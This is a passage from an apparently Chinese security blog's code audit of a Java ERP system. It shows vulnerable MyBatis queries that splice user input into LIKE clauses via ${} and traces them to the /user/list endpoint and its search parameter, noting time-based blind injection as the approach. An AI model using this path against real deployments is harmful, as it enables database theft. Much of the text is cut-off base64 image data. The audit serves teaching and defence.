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
<p>具体可通过调试得到这样通过apiname首字母大写+ Component即得到处理的对应类从该类中选择select方法</p>
<h2 id=toc-6>SQL注入</h2>
<h3 id=toc-7>审计关键点</h3>
<ul>
<li>重点关注创建查询的函数如 <code>createQuery()</code><code>createSQLQuery()</code><code>createNativeQuery()</code></li>
<li>定位SQL语句上下文查看是否有参数直接拼接是否有对模糊查询关键字的过滤。</li>
<li>是否使用预编译技术,预编译是否完整,关键函数定位<code>setObject()</code><code>setInt()</code><code>setString()</code><code>setSQLXML()</code>关联上下文搜索<code>set*</code>开头的函数。</li>
<li>Mybatis中搜索${}因为对于like模糊查询、order by排序、范围查询in、动态表名/列名,没法使用预编译,只能拼接,所以还是需要手工防注入,此时可查看相关逻辑是否正确。</li>
<li>JPA搜索<code>JpaSort.unsafe()</code>查看是否用实体之外的字段对查询结果排序进行了SQL的拼接。以及查看<code>EntityManager</code>的使用也可能存在拼接SQL的情况。</li>
</ul>
<h3 id=toc-8>注入点1</h3>
<h4>分析</h4>
<p>根据SQL注入代码审计经验Mybatis框架下一般寻找mapper下的xml文件中的<code>${}</code></p>
<p><a id=img5 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233022-d09f78b8-c116-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA9QAAAJ0CAYAAADzv2veAAEAAElEQVR4nOzde1Bc550n/O/hIroRlwZkBJIAAY2RbSRHQiIzdozjyJKZkVeDLOTacSa1hnGkCXk3JKkkklXzemddUzLEKY/xlPUOSha8lbF3x0Ij4o3GWAp2QsbxDtBCsloXRNMNrXARAlo0l24QcN4/+kKfvtHdNA1I308VVaLPc57nd57TIH79XI5gNBpFEBEREREREZHPPvnkE4QtdxBEREREREREqxETaiIiIiIiIqIAMKEmIiIiIiIiCgATaiIiIiIiIqIAMKEmIiIiIiIiCgATaiIiIiIiIqIARCx3AEREREREtLqJoojR0VGYzeblDuW+FR4ejtjYWMhksuUOZUnpdDpkZmYudxg+Y0JNREREREQBE0UR/f39mJ6eRnR0NCIjI5c7pJCanp7GmjVrIJfLl6wNURQxPj6O/v5+rF+/HtHR0UvWFvmHCTUREREREQVscnISU1NTSE5Oxtq1a5c7nJAbGBgAgCUfOZbL5YiIiIDBYGBCvYJwDTUREREREQXs3r17iIyMfCCT6VCLi4vDvXv3ljsMcsCEmoiIiIiIAiaKIiIiOPE1VERRXO4QyAETaiIiIiIiInpgzM7OBq0ufpRERERERKuCKIoYGRnB5OSk3+dGR0cjMTERgiAsQWREtFpMT0/j1KlTeOGFF7Bhw4ZF18eEmoiIiIhWhRs3buDOnTtQKBR+n6vT6fDQQw/hkUceCX5gRPcpnU4HnU4X0LmZmZkr8vFXFy5cwMDAAOrq6lBaWrropNrvhFrsehd7tr+KFhTgjfYL+G724j7lE89XIL6kDkAp6kffxl6nTw2D3Z7HOJzaKc+6gO/Hl6BuidslIiIiooWZzWb09/fjG9/4BmJjY/0+f2xsDJ9++ikyMzPv++f4rmaiaMDF+g/Rhp14sWQHEjijYFndvn0bn376aUDnPv/88ysuoe7t7cV//Md/AABMJlNQkmq3a6jPV8QhLs7169l3uwJuaCW4X6+LiIiI6H43PT0NAAEl047n2eqh0BMNKpyuaYKOm2qtGl/96lfx2GOP+X3eY489hq9+9atLEFHg5ubm8Ktf/Qpzc3P212xJdV9fX8D1+r0pmZD9XfzGaITR+JuQjNqGqr1QX5cnongeFXEVOO/mF43kA4Fn30WXU5mFjq8motiFd5+NQ8X5pbsGsetdPBv3LN7tCqwNy/me+9x2DfbjFeeDFTq63n3WWm8FPtHMX4fl/RP4NREREdHCzldI/993/n61OF8R3L9PFqRIROICRQQhAfmHjuDIoXyOTq8AgiCgpKQEaWlpPp+TlpaGkpKSFbdfwRdffOE2cV5sUu09oS6th9FotH/95rvZATWy4qzQ6+p691nEx5egzs2x8xVxKLn6BtpHRzE62o438Cq2f/+Cz8dXgq53n12V/9m4I4pdOHnkJn4yOgqj0ei2zy98/whQYztej9K6kqDMhhC73sWRV4E32kdhNFZj78r6XUVERLTqzX9wLf2qOC9CFLvQeXW5I1xdRF0TTp06hVOfaoFEBUY+PYWamtNQGVb/34QPgsjISHzrW99CYuJCH4cAiYmJ+Na3voXIyMgQROZZb28vPv30U/vX//k//we/+c1vPJZfTFLt9wj1/KicbURsfhTu2Xe7nH4BuY60Oh9fKOVbbHuBXpfHcucrpL9cXUYlz6PCzS/fhZyviMP2mz/BaPsbKHBuUzyPc3UFeKOmHNmCAEHIRnnNGyioO4fzorjgcWdd7z7Lae6wzUoIbEaCIGTju7+ptq/5F4RslP+kFHDo873V83ULwl7sK/Vcn1/3pOsmWvAYcrIWfx1ERETkSSnqrR+c276q9wrWvwGMMP7mu8heYSNwK5WQuRuHDx/G4Sygy6DC3azDOHLkEPIT3PefrqkGNadVMFj/phJFA1SnayxJ+alTqHGYNu5c1l0d3s4PldHRUYyMjPj0FcxHOgVLdHQ0Xn75ZURHRy+qTKikpqZiaGjInlD/x3/8B+7du+f1nKmpKVy/ft3vtoL7HOqzR7D91RaHF+pQ4jSK6nK8xN14bHDaC7aud5+1bqDmoOVVbN9zEl3WxPb7HkaYF7K32ghj9V73By+cQ51DAgUAyMrBY6jDuQs+HA/Q/LRrxw8JLB9aOE4vd/zAwHkatO2Y/d63vIrt8fGS6UXePxTRSqZNS9py+vBCcszxgw8PU5kcp3zPX6vjNG3/pk5rO68CBQ/D3XwHsetd/LSuAAeKstwc9d38e7AOJdZ+9DZ1fbF9RERERBQMokGF+vPAnkP5GDn/qV8J7d2LF4FnD+Pw4cP49rcPYWeiBufrL8IgiticpQRGtNDelbbVpgGUOy2bmnk7P1RMJhPa2trQ2trq9ev27dsIDw8PWVz+8Db67M8odiiEhYWhpKQE27Zt86l8amoqjhw5gt27d/vfltejdSUOic7CyUVLy2P2T/LqbaNxtlHUrnfxU1umaZ1yPTrajjech2P94K29YF4XYElM3rEm76X1o9L4W17FOxcAaDthmQEk/USzOhhzcj0kaj4fX4S6knPYZ5tKXmBJ5M7ts1xf+xsFqCv5vr3PLzQCNbZp0PWl9mN7qy1lUWCZlm778MCSaM/fx9H2h9F5wbHt+WnT9aVA3U9tH1504eSeElx9o9163hu4WrLHkhx3vYs9JVetU6KNGN3X6XNiLG2vBa8eOenTFHXb+6PgQJH902rHZDZ++038ZHTxu8Vnf/c3GK0vhf095ulDGGDJ+oiIiOhB58ua6YX2WnFbZ8V56UCD9Rxvgw8ue7a4HPf84brbGKyzQO31Bmm5XvfFNmDnDmQm5OPZnSNou3jX53MT8nfbR7MFIQE7diqBkbu4CwCbd2Bn4gi0Dhn1Xa0WI1Aia7MP54dISkoKtmzZsugyy83d+uhA1lmHgi2pViqVHstERkaiqKgI3/nOd7Bx48bA2gk0QHcK3viefQrsHuf5rV03YUlHC/DG9/YAcJgmuxTtBduFc/aR57qSeEuSFL8dtgHyq51a66gwYB89XNIdxLPxsNcPI6THHX+pb3+1BS2vbvd5SnppveVxZoKQjaIDlqTYeguRVXQABbiKTq3l+73fdZj+lP2w5Jgz26jtG+3zj0sTsr+L7zp8AFHwRo09Cd3zvTdQ0HITXQBw4R282lKKn5Rn2QLBgYIWnG20NdaCm9auF/Z+1+dE1mN7XojnKxAfb0lcHdfjC8JeVFs/VBltfxg/jY+XvB8Wc098skR9RERERN6J5ysQv/0sDrQ77bWyZ4EP6utKcAQ19g/CC6wz+7bf/Mn8nixOMzK1J99x2LPFOvjhNHvS9uG60WjEvk73MXS9+yxK6iwDR0uxv1Dm7iM4lJ8AAEjIP2T/t690TfNTtn9+Yf7vKUFIQFZWIka0Wvv0bq12BIk7dyDTIenzdH4opaenIyvL/WzFxMREbN26dcVt5OXOY489hvj4ePv38fHxAe0EHgpGoxG9vb1uj2VnZ6OiogJf+9rXEBYWeFrsx6Zk99EazSW6LkHYi7dH6+GY2re8uj04SbVLYteFmy0FeDjbt+Pzu5hbRooLHH6x+j2C/liO2zVDzp+Qxm9/FS1uTp8PUboW2H1T7g9qO6/C8YMLxw83hOzv4kJ9qf2DD3/631N7npyviEO8daTX238+QvZ3UfNGAVrONtr/EwvqPXFjqfqIiIjowTD/f6g/e/WIYhdO/rQOpfUXHPZSse5v03IWjR4GGgAABW+gxvpBuJD9XVjGnUpR/7ZtMMq6J8vVTvvfE9nfrZa285PS+b8LrbMnHf++kQx+2GI+X4Htr7ag4I12+98gK2WtuCjq0FRTg/MaJfZ8+9uWadt7pH9zKbKykDjShovdAO5qoR1JRFaWwufzQyknJ8dlJDQ2Nhbbt29fVFJHrmZnZ/G///f/hslkcnt8586d
<p>挺多先看这两个对应在UserMapperEx.xml文件中查询如下</p>
<div class=highlight><pre><span></span><span class=nt>&lt;select</span> <span class=na>id=</span><span class=s>"countsByUser"</span> <span class=na>resultType=</span><span class=s>"java.lang.Long"</span><span class=nt>&gt;</span>
select count(user.id)
FROM jsh_user user
left join jsh_user_business ub on user.id=ub.key_id
left join jsh_orga_user_rel rel on user.id=rel.user_id and ifnull(rel.delete_flag,'0') !='1'
left join jsh_organization org on rel.orga_id=org.id and ifnull(org.org_stcd,'0') !='5'
where 1=1
and ifnull(user.status,'0') not in('1','2')
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"userName != null"</span><span class=nt>&gt;</span>
and user.username like '%${userName}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"loginName != null"</span><span class=nt>&gt;</span>
and user.login_name like '%${loginName}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/select&gt;</span>
</pre></div>
<p>一看like只要这里两个参数可控另外这里要查询的是一个数字无其他可用的返回参数即可能存在SQL注入优先考虑时间盲注。找到对应的Mappper即UserMapperEx</p>
<div class=highlight><pre><span></span><span class=n>Long</span> <span class=nf>countsByUser</span><span class=o>(</span>
<span class=nd>@Param</span><span class=o>(</span><span class=s>"userName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>userName</span><span class=o>,</span>
<span class=nd>@Param</span><span class=o>(</span><span class=s>"loginName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>loginName</span><span class=o>);</span>
</pre></div>
<p>继续网上找调用此方法的serviceCtrl+B找到上层UserService</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=n>Long</span> <span class=nf>countUser</span><span class=o>(</span><span class=n>String</span> <span class=n>userName</span><span class=o>,</span> <span class=n>String</span> <span class=n>loginName</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Long</span> <span class=n>result</span><span class=o>=</span><span class=kc>null</span><span class=o>;</span>
<span class=k>try</span><span class=o>{</span>
<span class=c1>// 这里</span>
<span class=n>result</span><span class=o>=</span><span class=n>userMapperEx</span><span class=o>.</span><span class=na>countsByUser</span><span class=o>(</span><span class=n>userName</span><span class=o>,</span> <span class=n>loginName</span><span class=o>);</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>JshException</span><span class=o>.</span><span class=na>readFail</span><span class=o>(</span><span class=n>logger</span><span class=o>,</span> <span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>继续Ctrl+B这里有两个调用处由于第一个UserController中调用的countUser两个参数均为null暂时忽略来到UserComponent</p>
<div class=highlight><pre><span></span><span class=nd>@Override</span>
<span class=kd>public</span> <span class=n>Long</span> <span class=nf>counts</span><span class=o>(</span><span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>map</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>String</span> <span class=n>search</span> <span class=o>=</span> <span class=n>map</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>);</span>
<span class=n>String</span> <span class=n>userName</span> <span class=o>=</span> <span class=n>StringUtil</span><span class=o>.</span><span class=na>getInfo</span><span class=o>(</span><span class=n>search</span><span class=o>,</span> <span class=s>"userName"</span><span class=o>);</span>
<span class=n>String</span> <span class=n>loginName</span> <span class=o>=</span> <span class=n>StringUtil</span><span class=o>.</span><span class=na>getInfo</span><span class=o>(</span><span class=n>search</span><span class=o>,</span> <span class=s>"loginName"</span><span class=o>);</span>
<span class=c1>// 这里</span>
<span class=k>return</span> <span class=n>userService</span><span class=o>.</span><span class=na>countUser</span><span class=o>(</span><span class=n>userName</span><span class=o>,</span> <span class=n>loginName</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>还是没有到Controller层继续Ctrl+B来到CommonQueryManager</p>
<div class=highlight><pre><span></span><span class=cm>/**</span>
<span class=cm> * 计数</span>
<span class=cm> * @param apiName</span>
<span class=cm> * @param parameterMap</span>
<span class=cm> * @return</span>
<span class=cm> */</span>
<span class=kd>public</span> <span class=n>Long</span> <span class=nf>counts</span><span class=o>(</span><span class=n>String</span> <span class=n>apiName</span><span class=o>,</span> <span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>apiName</span><span class=o>))</span> <span class=o>{</span>
<span class=c1>// 这里</span>
<span class=k>return</span> <span class=n>container</span><span class=o>.</span><span class=na>getCommonQuery</span><span class=o>(</span><span class=n>apiName</span><span class=o>).</span><span class=na>counts</span><span class=o>(</span><span class=n>parameterMap</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>BusinessConstants</span><span class=o>.</span><span class=na>DEFAULT_LIST_NULL_NUMBER</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>继续往上终于来到ResourceController</p>
<div class=highlight><pre><span></span><span class=nd>@GetMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/{apiName}/list"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>getList</span><span class=o>(</span><span class=nd>@PathVariable</span><span class=o>(</span><span class=s>"apiName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>apiName</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>PAGE_SIZE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>pageSize</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>CURRENT_PAGE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>currentPage</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>String</span> <span class=n>search</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=c1>// search参数放入map</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>requestToMap</span><span class=o>(</span><span class=n>request</span><span class=o>);</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>search</span><span class=o>);</span>
<span class=n>PageQueryInfo</span> <span class=n>queryInfo</span> <span class=o>=</span> <span class=k>new</span> <span class=n>PageQueryInfo</span><span class=o>();</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>pageSize</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>pageSize</span> <span class=o>&lt;=</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=n>pageSize</span> <span class=o>=</span> <span class=mi>10</span><span class=o>;</span>
<span class=o>}</span>
<span class=n>String</span> <span class=n>offset</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>getPageOffset</span><span class=o>(</span><span class=n>currentPage</span><span class=o>,</span> <span class=n>pageSize</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>offset</span><span class=o>))</span> <span class=o>{</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>OFFSET</span><span class=o>,</span> <span class=n>offset</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>list</span> <span class=o>=</span> <span class=n>configResourceManager</span><span class=o>.</span><span class=na>select</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>);</span>
<span class=n>objectMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"page"</span><span class=o>,</span> <span class=n>queryInfo</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>list</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;</span><span class=n>Object</span><span class=o>&gt;());</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>DEFAULT_LIST_NULL_NUMBER</span><span class=o>);</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=s>"查找不到数据"</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=n>list</span><span class=o>);</span>
<span class=c1>// 这里</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>configResourceManager</span><span class=o>.</span><span class=na>counts</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>));</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>这里包含一个路径变量apiName以apiName为名找对应的处理包对应的包中存在Component类根据上面分析从UserComponent中来的对应的是user包因此apiName为user</p>
<p>另外根据UserComponent类中的counts方法在map中寻找userName和loginName因此search参数包含userName和loginName</p>
<p>正向数据链:/user/list——&gt;ResourceController.getList——&gt;CommonQueryManager.counts——&gt;UserComponent.counts——&gt;UserService.countUser——&gt;UserMapperEx.countsByUser——&gt;UserMapperEx.xml中id为countsByUser的查询</p>
<p>同样的道理在这个getList方法中还有一个select查询对应的数据链</p>
<p>/user/list——&gt;ResourceController.getList——&gt;CommonQueryManager.select——&gt;UserComponent.select——&gt;UserComponent.getUserList——&gt;UserService.select——&gt;UserMapperEx.selectByConditionUser——&gt;UserMapperEx.xml中id为selectByConditionUser的查询</p>
<div class=highlight><pre><span></span><span class=nt>&lt;select</span> <span class=na>id=</span><span class=s>"selectByConditionUser"</span> <span class=na>parameterType=</span><span class=s>"com.jsh.erp.datasource.entities.UserExample"</span> <span class=na>resultMap=</span><span class=s>"ResultMapEx"</span><span class=nt>&gt;</span>
select user.id, user.username, user.login_name, user.position, user.email, user.phonenum,
user.description, user.remark,user.isystem,org.id as orgaId,user.tenant_id,org.org_abr,
rel.user_blng_orga_dspl_seq,rel.id as orgaUserRelId,
(select r.name from jsh_user_business ub
inner join jsh_role r on ub.value=concat("[",r.id,"]") and ifnull(r.delete_flag,'0') !='1'
where ub.type='UserRole' and ub.key_id=user.id limit 0,1) roleName
FROM jsh_user user
left join jsh_orga_user_rel rel on user.id=rel.user_id and ifnull(rel.delete_flag,'0') !='1'
left join jsh_organization org on rel.orga_id=org.id and ifnull(org.org_stcd,'0') !='5'
where 1=1
and ifnull(user.status,'0') not in('1','2')
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"userName != null"</span><span class=nt>&gt;</span>
and user.username like '%${userName}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"loginName != null"</span><span class=nt>&gt;</span>
and user.login_name like '%${loginName}%'
<span class=nt>&lt;/if&gt;</span>
order by rel.user_blng_orga_dspl_seq,user.id desc
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"offset != null and rows != null"</span><span class=nt>&gt;</span>
limit #{offset},#{rows}
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/select&gt;</span>
</pre></div>
<h4>测试</h4>
<p>触发界面</p>
<p><a id=img6 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233046-debeea6e-c116-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB10AAAMoCAYAAACETfmvAAEAAElEQVR4nOzdfXxT5f3/8ddJm7ak0AIWbKXcSLmpQrUwFUEE6wRR3BeUoX71i+AmCm4THHwHboPvJpuCP5joNoF5R2WyKUNh0w3RrYIIMh2ggJabIjfVVlpuWmhpmzTn90eSNkmTJr2BpvB++sCrV66TkyvNOVfb8zmf6zKSF5smIiIiIiIiIiIiIiIiIlLjeId5VFlzG/ScmKp+dDz507PUI4lklpbugIiIiIiIiIiIiIiIiEiksUcfavhzrAfOQk+kNVDQVURERERERERERERERMSPaZw5J8+R84OCriIiIiIiIiIiIiIiIiJhmnbjHzD/+w/k9GnpnkgkiW7pDoiIiIiIiIiIiIiIiIhEumk3/oHFF8e7a2Ut2pfG6NTG5Jae1Xy7ezUXt6kmnnJsxhlOO2MpJ55vKqL556Eo1h2IouiM0dLdbXUUdBUREREREREREREREREJy9e8/00iN1zc0v0I31XJ1UzNdJDVzYndbmf/nt2se/VNPv7oQ06VlBAbF8dlGVcy8taxzLrqWn4xJJ73j0SxZEc0nxRGtXT3Ww0jebFptnQnRERERERERERERERERCJJYed7Az7uyniF9//zIFl767YnH331LPcsPDd0rWbqAAdXJzsxTZMzZ8rZvOE9XnjuN5w8Xlxn+9jYNtxx933cdvvddEzqhGEYfFxg4ffbo9mYr+BrKOd8TdfUYfDlFFg5DFK9Hh+cCUtGuf8NOde9EhERERERERERERERETk/jOheze9HVHF1shMA03Ty2faPefH3iwIGXAEqK8+w+k/L2fjPf1BZcQaAq1OcLBlZxYju1ees763VuZ1euB28nAFx0ZA1AD7uDqNXwDagfxqM9URhj8PUzb5PTe0DLw+C19fA86dqH984DXqfpe6+9gxMP0v7FhEREREREREREREREWluPxhg58dXOTC8lmUt/Por3vnrak4cP+Z6IMiSrVWVlfx19Z9I69uPjMyrMAxoEw1LR1ax8ONoluywnv030Eqd06Dr4rHQ3+sVN+90BVzr1Q5+ORLuS4U4oNdY2LcC3j9bnRQRERERERERERERERFphUZdWs2jfgFX04QTx4/x2Y6PibdZubJPFzp1bMeeL7/heEkZbeKs9OnRGcOAbZ/nU3S0kJKTxTidDqKiXIE9w4AZVzvYXWzRVMNBnLOg6+RxcFfH2npJPkzbUf9zxgyDn2VAV69exnWEp0bBNetc9XV7YHd9O+kIYzt5vW4R5BwPr8/eybaNyaj1yZTNhNzhkBjG8yoq4UgRPL8BVvhneIe5nwoHHMmHRf+CtadCbCwiIiIiIiIiIuKRBD/NgP074fXAsw9GhMnj4PFOMHcpPN/SnREREYkA6R2d/CarCkudLFYTu70KCw6GXd2byd+9Dmu0xd0CYGDgmoI4Z+teXn9nO0WFhZwpL6dtu4SavVgM+O1NVfz332L5/Ng5X8E04p2ToOsNI+Cn3gu4lsKU1ZAf7AmxsHEK9I6t2/Sf7TBlY239CXfwdXAm3Jdcd/uuNt/60dLQ/c1ZB6+H3uysiYuF3qnw1F3wrbdg+qFG7CMaeveApffCkH/ArEbsQ0RERERERETOjn7dT9KL9qxt6t/rSRWM6Vjh+5gjjv8ciCNrxHLus93A/WuTefz+NtySAPs+Nxn20U